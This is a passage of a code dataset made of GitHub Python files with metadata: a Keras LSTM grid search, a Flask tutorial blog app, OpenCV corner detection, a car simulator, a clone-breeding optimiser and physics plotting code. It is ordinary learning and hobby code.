regressor.add(LSTM(units=100, return_sequences=True, input_shape=(X_train.shape[1], 1)))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100, return_sequences=True))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100, return_sequences=True))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100, return_sequences=True))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100, return_sequences=True))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100))\n regressor.add(Dense(units=1))\n \n regressor.compile(optimizer=optimizer, loss='mean_squared_error')\n \n return regressor\n\nregressor = KerasClassifier(build_fn=build_classifier)\nparameters = {'batch_size': [25, 32],\n 'epochs': [100, 500],\n 'optimizer': ['adam', 'rmsprop']\n }\ngrid_search = GridSearchCV(estimator=regressor,\n param_grid=parameters,\n scoring='neg_mean_squared_error',\n cv=10)\ngrid_search = grid_search.fit(X_train, y_train) \n\nbest_parameters = grid_search.best_estimator_\nbest_accuracy = grid_search.best_score_\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "igobarros/Curso-Udemy-Deep-Learning_AZ", "sub_path": "Volume 1 - Supervised Deep Learning/Part 3 - Recurrent Neural Networks (RNN)/Section 12 - Building a RNN/rnn.py", "file_name": "rnn.py", "file_ext": "py", "file_size_in_byte": 6436, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 54, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 61, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 90, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 109, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 109, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 144, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 146, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 148, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 151, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 152, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 154, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 155, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 157, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 158, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 160, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 161, "usage_type": "call"}, {"api_name": "keras.wrappers.scikit_learn.KerasClassifier", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 172, "usage_type": "call"}]}
+{"seq_id": "42546103225", "text": "#all the imports\nfrom __future__ import with_statement\nfrom contextlib import closing\nimport sqlite3\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n\n\n# configuration\nDATABASE = 'flaskr.db'\nDEBUG = True\nSECRET_KEY = 'development key'\nUSERNAME = 'admin'\nPASSWORD = 'default'\n\n# create our littel application\napp = Flask(__name__)\napp.config.from_object(__name__)\n# app.config.from_envvar('FLASKR_SETTINGS' silent=True)\n\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql') as f:\n db.cursor().executescript(f.read().decode())\n db.commit()\n\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n@app.teardown_request\ndef teardwon_request(exception):\n g.db.close()\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef show_entries():\n cur = g.db.execute('select title, text, id from entries order by id desc')\n entries = [dict(title=row[0], text=row[1], id=row[2]) for row in cur.fetchall()]\n\n result = {'entries': entries}\n\n #mode = 0:add, 1:edit\n mode = 0\n\n if request.method == 'POST':\n result['origin_title'] = request.form['origin_title']\n result['origin_text'] = request.form['origin_text']\n result['id'] = request.form['id']\n mode = 1\n flash('EDIT MODE')\n\n result['mode'] = mode\n\n return render_template('show_entries.html', result=result)\n\n\n@app.route('/add', methods=['POST'])\ndef add_entry():\n if not session.get('logged_in'): # session['logged_in']\n abort(401)\n g.db.execute('insert into entries (title, text) values(?, ?)', [request.form['title'], request.form['text']])\n g.db.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('show_entries'))\n\n\n@app.route('/edit', methods=['POST'])\ndef edit_entry():\n if not session.get('logged_in'):\n abort(401)\n g.db.execute('update entries set title = ?, text = ? where id = ?', [request.form['title'], request.form['text'], request.form['id']])\n g.db.commit()\n flash('successfully edit no.'+request.form['id'])\n return redirect(url_for('show_entries'))\n\n\n@app.route('/del', methods=['POST'])\ndef del_entry():\n if not session.get('logged_in'):\n abort(401)\n g.db.execute('delete from entries where id = ?', [request.form['id']])\n g.db.commit()\n flash('successfully delete no.'+request.form['id'])\n return redirect(url_for('show_entries'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n # session.setattribute('logged_in', True)\n\n flash('You were logged in')\n return redirect(url_for('show_entries'))\n return render_template('login.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('logged_in', None)\n\n # session['logged_in'] = None\n # del(session['logged_in'])\n flash('you were logged out')\n return redirect(url_for('show_entries'))\n\n\nif __name__ == '__main__':\n app.run()\n\n", "repo_name": "hiyee/seon", "sub_path": "practice.py", "file_name": "practice.py", "file_ext": "py", "file_size_in_byte": 3366, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 22, "usage_type": "call"}, {"api_name": "contextlib.closing", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.g.db.close", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.g.db.execute", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.g.db.execute", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 68, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 68, "usage_type": "name"}, {"api_name": "flask.g.db.commit", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.g.db.execute", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.g.db.commit", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.g.db.execute", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.g.db.commit", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 97, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 97, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 117, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "23271083091", "text": "import numpy as np\nimport cv2\n\nimg = cv2.imread('cube.jpg')\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n# get corner (x, y)\ncorners = cv2.goodFeaturesToTrack(gray, 5, 0.01, 10) # ..(img, maxCorners, qualityLevel, minDistance)\ncorners = np.int0(corners)\n\n# draw (red) points (where corners are) on Img\nfor i in corners:\n x,y = i.ravel()\n cv2.circle(img, (x,y), 3, (0, 0, 255), -1)\n\ncv2.imwrite('Detection.jpg', img)\ncv2.waitKey()\ncv2.destroyAllWindows()", "repo_name": "MrCode97/openCV", "sub_path": "Detection/Shi-Thomasi/thomasi.py", "file_name": "thomasi.py", "file_ext": "py", "file_size_in_byte": 462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 5, "usage_type": "attribute"}, {"api_name": "cv2.goodFeaturesToTrack", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "1755946681", "text": "import collections\n\nimport numpy as np\n\nPoint = collections.namedtuple(\"Point\", \"x y\")\n\n\nclass GameSimulator:\n def __init__(self, game_updater):\n self.car = SimulatedCar(np.array([390, 295]), np.array([6, 0]))\n self.game_updater = game_updater\n\n def update(self, dt):\n self.game_updater.update(self.car)\n\n\ndef _rotate(deg):\n theta = np.radians(deg)\n c, s = np.cos(theta), np.sin(theta)\n return np.array([[c, -s], [s, c]])\n\n\ndef _to_point(array):\n return Point(*array)\n\n\nclass SimulatedCar:\n angle = 0\n rotation = 0\n sensor1 = Point(0, 0)\n sensor2 = Point(0, 0)\n sensor3 = Point(0, 0)\n signal1 = 0\n signal2 = 0\n signal3 = 0\n\n def __init__(self, starter_center, velocity):\n self.velocity = velocity\n self._set_pos(starter_center)\n\n def _set_pos(self, pos):\n self.pos = pos\n self.x = pos[0]\n self.y = pos[1]\n\n def move(self, rotation, game_world):\n self._set_pos(self.velocity + self.pos)\n self.rotation = rotation\n self.angle = self.angle + self.rotation\n self.sensor1 = _to_point(np.matmul(_rotate(self.angle), np.array([30, 0])) + self.pos)\n self.sensor2 = _to_point(np.matmul(_rotate((self.angle + 30) % 360), np.array([30, 0])) + self.pos)\n self.sensor3 = _to_point(np.matmul(_rotate((self.angle - 30) % 360), np.array([30, 0])) + self.pos)\n\n self.signal1 = int(np.sum(game_world.sand[int(self.sensor1.x) - 10:int(self.sensor1.x) + 10,\n int(self.sensor1.y) - 10:int(self.sensor1.y) + 10])) / 400.\n self.signal2 = int(np.sum(game_world.sand[int(self.sensor2.x) - 10:int(self.sensor2.x) + 10,\n int(self.sensor2.y) - 10:int(self.sensor2.y) + 10])) / 400.\n self.signal3 = int(np.sum(game_world.sand[int(self.sensor3.x) - 10:int(self.sensor3.x) + 10,\n int(self.sensor3.y) - 10:int(self.sensor3.y) + 10])) / 400.\n if self.sensor1.x > game_world.width - 10 or self.sensor1.x < 10 or self.sensor1.y > game_world.height - 10 or self.sensor1.y < 10:\n self.signal1 = 1.\n if self.sensor2.x > game_world.width - 10 or self.sensor2.x < 10 or self.sensor2.y > game_world.height - 10 or self.sensor2.y < 10:\n self.signal2 = 1.\n if self.sensor3.x > game_world.width - 10 or self.sensor3.x < 10 or self.sensor3.y > game_world.height - 10 or self.sensor3.y < 10:\n self.signal3 = 1.\n\n self.reposition(game_world)\n\n def reposition(self, game_world):\n x = self.x\n y = self.y\n if x < 10:\n x = 10\n if y < 10:\n y = 10\n if x > game_world.width - 10:\n x = game_world.width - 10\n if y > game_world.height - 10:\n y = game_world.height - 10\n\n self._set_pos(Point(x, y))\n", "repo_name": "maczikasz/ai-learning-projects", "sub_path": "reinforcement-learning/self-driving-car/world/simulator/game_simulator.py", "file_name": "game_simulator.py", "file_ext": "py", "file_size_in_byte": 2868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.namedtuple", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.radians", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "39756083728", "text": "import sys\nfrom box import Box\nfrom result import Result\nfrom utils.progressbar import ProgressBar\nfrom utils.combinations import ncr\n\nclass FindSmart:\n def __init__(self, all_clones, max_generations, minimum_score):\n self.all_clones = all_clones\n self.current_generation = 0\n self.max_generations = max_generations\n self.minimum_score = minimum_score\n self.best_score = -100\n self.best_clones = set()\n\n def _process(self, box):\n result = box.get_offspring()\n if result in self.all_clones.clones():\n return\n score = result.score()\n if score > self.best_score:\n self.best_score = score\n self.best_clones = set()\n if score == self.best_score:\n resultBox = Result(result, box)\n self.best_clones.add(resultBox)\n if (score == 30) or \\\n (score >= self.minimum_score and \\\n self.current_generation < self.max_generations):\n self.all_clones.add_clone(result)\n\n def run(self):\n while self.current_generation < self.max_generations:\n self.current_generation += 1\n self._generation()\n\n def _generation(self):\n clones = list(self.all_clones.clones())\n num_clones = len(clones)\n pb = ProgressBar(ncr(num_clones, 4) + ncr(num_clones, 3))\n sys.stderr.write(\"Starting generation {} with {} clones\\n\".format(self.current_generation, num_clones))\n for i in range(num_clones):\n for j in range(i+1, num_clones):\n for k in range(j+1, num_clones):\n for l in range(k+1, num_clones):\n box = Box([clones[i], clones[j], clones[k], clones[l]], self.current_generation)\n self._process(box)\n pb.increment()\n\n for i in range(num_clones):\n for j in range(i+1, num_clones):\n for k in range(j+1, num_clones):\n clone1 = clones[i]\n clone2 = clones[j]\n clone3 = clones[k]\n box = Box([clones[i], clones[j], clones[k]], self.current_generation)\n self._process(box)\n pb.increment()\n pb.clear()\n\n def print(self):\n sorted_clones = sorted(list(self.best_clones), key=lambda result: (result.get_clone().yield_count(), result.get_box().get_size()))\n for result in sorted_clones:\n result.print()\n", "repo_name": "thagorn/rust_cloning", "sub_path": "algorithms/find_smart.py", "file_name": "find_smart.py", "file_ext": "py", "file_size_in_byte": 2504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "box.get_offspring", "line_number": 17, "usage_type": "call"}, {"api_name": "result.score", "line_number": 20, "usage_type": "call"}, {"api_name": "result.Result", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.progressbar.ProgressBar", "line_number": 40, "usage_type": "call"}, {"api_name": "utils.combinations.ncr", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 41, "usage_type": "attribute"}, {"api_name": "box.Box", "line_number": 46, "usage_type": "call"}, {"api_name": "box.Box", "line_number": 56, "usage_type": "call"}, {"api_name": "result.get_clone", "line_number": 62, "usage_type": "call"}, {"api_name": "result.get_box", "line_number": 62, "usage_type": "call"}, {"api_name": "result.print", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "42663930517", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\nfrom scipy.optimize import curve_fit\n\nwith open(r\"continuous delta model/data.pkl\", \"rb\") as f:\n t, evolution_of_E, evolution_of_nactive, fluctuation_E, fluctuation_nactive, time_to_reach_AS = pickle.load(f)\n \nphi = np.array([0.1495, 0.1496, 0.1497, 0.1498, 0.1499, 0.15 , 0.1501, 0.1502,\n 0.1503, 0.1504, 0.1505, 0.1506, 0.1507, 0.1508, 0.1509, 0.151 ,\n 0.1511, 0.1512, 0.1513, 0.1514, 0.1515, 0.1516, 0.1517, 0.1518,\n 0.1519, 0.152 , 0.1521, 0.1522, 0.1523, 0.1524, 0.1525, 0.1526,\n 0.1527, 0.1528, 0.1529, 0.153 ])\n\nN = np.array([10000, 10769, 11538, 12307, 13076, 13846, 14615, 15384, 16153,\n 16923, 17692, 18461, 19230, 20000, 20769, 21538, 22307, 23076,\n 23846, 24615, 25384, 26153, 26923, 27692, 28461, 29230, 30000])\n\nplt.figure()\nnum = -4\nfor i in range(0, len(phi) - 10, 2):\n plt.plot(t, evolution_of_nactive[i, num], label = phi[i])\nplt.xlabel(\"time, did I have once good units for time? No..\")\nplt.ylabel(\"n. of active particles\")\nplt.title(f\"N = {N[num]}\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.legend()\n\nplt.figure()\nfor i in range(0, len(N), 2):\n plt.plot(phi, time_to_reach_AS[:, i], label = f\"N = {N[i]}\")\nplt.xlabel(\"phi\")\nplt.ylabel(\"time to reach AS\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.legend()\n\n\n\nplt.figure()\nfor i in range(0, len(N) -2, 3):\n plt.subplot(121)\n plt.plot(t, evolution_of_nactive[3, i], label = N[i])\n plt.xlabel(\"time, did I have once good units for time? No..\")\n plt.ylabel(\"n. of active particles\")\n plt.title(f\"phi = {phi[18]}\")\n plt.xscale(\"log\")\n plt.yscale(\"log\")\n plt.legend()\n\n plt.subplot(122)\n plt.plot(t, evolution_of_nactive[25, i], label = N[i])\n plt.xlabel(\"time, no good units? have i ever?\")\n plt.ylabel(\"n. of active particles\")\n plt.title(f\"phi = {phi[25]}\")\n plt.xscale(\"log\")\n plt.yscale(\"log\")\n plt.legend()\n\nplt.figure()\nplt.imshow(time_to_reach_AS, extent = [min(N), max(N), min(phi), max(phi)], origin = 'lower', cmap = \"magma\", aspect = (np.max(N) - np.min(N))/(np.max(phi) - np.min(phi)))\nplt.xlabel(\"N\")\nplt.ylabel(r\"$\\phi$\")\nplt.title(\"time to reach ss\")\nplt.colorbar()\n\nplt.figure()\nplt.imshow(fluctuation_nactive, extent = [min(N), max(N), min(phi), max(phi)], origin = 'lower', cmap = \"magma\", aspect = (np.max(N) - np.min(N))/(np.max(phi) - np.min(phi)))\nplt.xlabel(r\"N\")\nplt.ylabel(r\"$\\phi$\")\nplt.title(r\"color = $N(\\langle \\rho_a^2\\rangle - \\langle \\rho_a\\rangle^2)$\")\nplt.colorbar()\n\nplt.figure()\nplt.imshow(fluctuation_E, extent = [min(N), max(N), min(phi), max(phi)], origin = 'lower', cmap = \"magma\", aspect = (np.max(N) - np.min(N))/(np.max(phi) - np.min(phi)))\nplt.xlabel(r\"N\")\nplt.ylabel(r\"$\\phi$\")\nplt.title(r\"color = $N(\\langle E^2\\rangle - \\langle E\\rangle^2)$\")\nplt.colorbar()\n\n\ndef linearL(x, a, b, c):\n return a - b*np.log(x - c)\n\ndef power(x,a, b, c):\n return a*(x - c)**(-b)\n\n\n\ndef critical(x, y):\n where = np.logical_not(np.isnan(y))\n a, b = curve_fit(linearL, x[where], np.log(y[where]), p0 = (-6, 1.5, 0.149))\n return a\n\nplt.figure()\nplt.plot(phi, fluctuation_nactive[:, -7])\nplt.xscale('log')\nplt.yscale(\"log\")\nplt.xlabel(r\"$\\phi$\")\nplt.ylabel(r\"variance of active particles\")\n\nplt.figure()\nplt.plot(phi, fluctuation_E[:, -7])\nplt.xscale('log')\nplt.yscale(\"log\")\nplt.xlabel(r\"$\\phi$\")\nplt.ylabel(r\"variance of energy BY particle\")\n\ncritical_arr = []\nphic = []\nplt.figure()\nfor i in range(6, 10):\n plt.plot(phi, fluctuation_nactive[:, -i], label = N[-i])\n setdata = critical(phi, fluctuation_nactive[:, -i])\n critical_arr.append(setdata[1])\n phic.append(setdata[2])\nplt.xscale('log')\nplt.yscale(\"log\")\nplt.xlabel(r\"$\\phi$\")\nplt.ylabel(r\"variance of active particles\")\nphi_c = np.mean(np.array(phic))\ncritical_val = np.mean(np.array(critical_arr))\nprint(f\"phi_c = {phi_c} and exponent = {critical_val}\")", "repo_name": "Syrocco/figures", "sub_path": "continuous delta model.py", "file_name": "continuous delta model.py", "file_ext": "py", "file_size_in_byte": 3888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pickle.load", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 